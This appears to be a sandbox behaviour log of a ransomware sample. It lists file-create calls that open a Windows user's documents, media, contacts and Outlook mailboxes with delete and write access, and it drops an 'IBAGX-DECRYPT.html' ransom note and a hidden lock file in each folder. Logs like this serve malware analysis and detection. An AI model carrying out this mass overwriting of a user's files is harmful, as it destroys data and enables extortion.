Create C:\Users\EEBsYm5\AppData\Roaming\Ylbk7NKyuQCHx8-9.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\z5AcyaMPE1VuXrO.bmp desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\_FBLDC8.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\_rz--U_afHNhCzNIUSv_.mp4 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Application Data\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Create C:\Users\EEBsYm5\Application Data\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Contacts\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\Contacts\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Contacts\Administrator.contact desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Contacts\ihnvbh euuncnh.contact desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Contacts\lodkd auftnm.contact desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Contacts\mneuc uhnfghgg.contact desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Contacts\ofhbnh edferrr.contact desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Contacts\uosjfl sidvllie.contact desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Cookies\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\Cookies\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Desktop\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\Desktop\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Desktop\-86NJ3BFPDGrZFF.png desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Desktop\5rRQ_i9lb.swf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Desktop\7jqDJu1dj.bmp desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Desktop\8h1goTpD.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Desktop\8PPNtAf0-.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Desktop\a9AoUj5.swf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Desktop\ad_Tuc8.pps desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Desktop\ex0MfWSTF6uCN0DP.pdf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Desktop\eXNP4DhaJoANqCq.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Desktop\g7mt5-SI_hHnzE.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Desktop\JMyoxX2 3X d6jTWhO.xls desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\1PqlR.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\200Iz-C-f0nKIP ff.png desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\74-V-SbJd.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\G_oqdbQ64.bmp desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\p0mIcXIX8lNpMXDlmou2\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\p0mIcXIX8lNpMXDlmou2\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\p0mIcXIX8lNpMXDlmou2\0IHc8uAhJnb-Q.mp4 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\p0mIcXIX8lNpMXDlmou2\9j oiWdFEKpFCdim_0.pdf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\p0mIcXIX8lNpMXDlmou2\A9egdeW4P.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\p0mIcXIX8lNpMXDlmou2\RLjqHSrzY.xls desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\p0mIcXIX8lNpMXDlmou2\U0ht6rC7mN9egdk.gif desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\p0mIcXIX8lNpMXDlmou2\ZlXEoiVfGfnX.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\P67Lb\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\P67Lb\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\P67Lb\-a9c.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\zAvVCDMGKYcJB8.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\ZMVPUoR4Ey_\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\ZMVPUoR4Ey_\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\ZMVPUoR4Ey_\ezswwH.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\ZMVPUoR4Ey_\kZHZh4.ppt desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Desktop\N-WKe9JDB7r4RB97pRb\ZMVPUoR4Ey_\PCQ1 cz9T-LwwY8.flv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Desktop\NiFznrza-cuYhF3XD.odt desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Desktop\PLO41w6ANW9pL7.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Desktop\rB5hKaXeP5JR.flv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Desktop\s0Wrd7q9CMtp_fsJOz6b.mkv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Desktop\YmArDfnGLJU.mp4 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Desktop\YwiFBFx2VZDk0I.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Desktop\zn0R8uiu0U0YNg5hW cJ.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\Documents\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Documents\-AklCqe39X1_.pdf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\-Iwok.ppt desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\-_udZ9H-md026R1 Y.ppt desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\01hJy.odp desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\2aJ44J.pptx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\3bj9uZ.pptx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\4N 7U.xlsx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\4teabLPmh.doc desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\78MMU46.xlsx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\8b k1TNzn-EWnDs.xlsx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\aqN UKHSTcas3Lof.docx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\BUbmaM2Cs.xlsx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\BWa71g9bKR14.ots desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\CptF0CQptW.xls desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\DR-dN95_OGPo50XZ.docx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\Ec5m5yEnbdvw0N.docx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\fdQCv4xTextmBuV75 T.xls desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\fh kVD.ots desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\FNbhvj.xls desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\g7gsGDs6Z5SOfWF.doc desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\GS5zGTs.docx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\gzpDmePLWUQ-3aL2.ods desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\IABwhWssazxs.pptx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\IfG35dKsGuJWChXuwlaP.pptx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\ItN 9hMlFUbe.docx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\iXfxaz7.ppt desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\Jb-3SP4fL9j3NKyqknte.docx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\JjOcfuG.doc desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\JwzV5eRX71p7.xls desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\K smlrz.ppt desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\Ln4 11aV.odt desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\lND3S0zYE.odp desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\lSnud6IXFLA_JmAsw3.ots desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\l_ 5qSZy_LxOOMHdkksx.ods desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\m6x7dtSmh7Qv0q5OP7.odt desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\MfEGZi5wBZ.xls desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\My Music\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\Documents\My Music\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Documents\My Pictures\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\Documents\My Pictures\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Documents\My Shapes\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\Documents\My Shapes\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Documents\My Shapes\_private\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\Documents\My Shapes\_private\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Documents\My Videos\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\Documents\My Videos\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Documents\OTggDUZVML.ots desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\Outlook Files\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\Documents\Outlook Files\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\Documents\Outlook Files\feasf@efw.com.pst desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\Outlook Files\Outlook Data File - mail.pst desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\pjtdG1IhTs0F_.ods desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\PtWDDKT48ZZRUp0.docx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\Pw4959I.pptx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\R Al.csv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\RcPvvQ.rtf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\S3c10E.pdf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\Sal-.pdf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\sFJh12vz2.pptx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\tI5FlZ6hziikPfsg5.docx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\TLmNEpd.pptx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\uCwmeKTSRVgfGO6IafsY.pptx desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\v1ScY3iP2CWDG2MFD.ods desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\vDMgfqDMCjBF0dZrH.doc desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\Documents\VPanbWR3r.rtf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
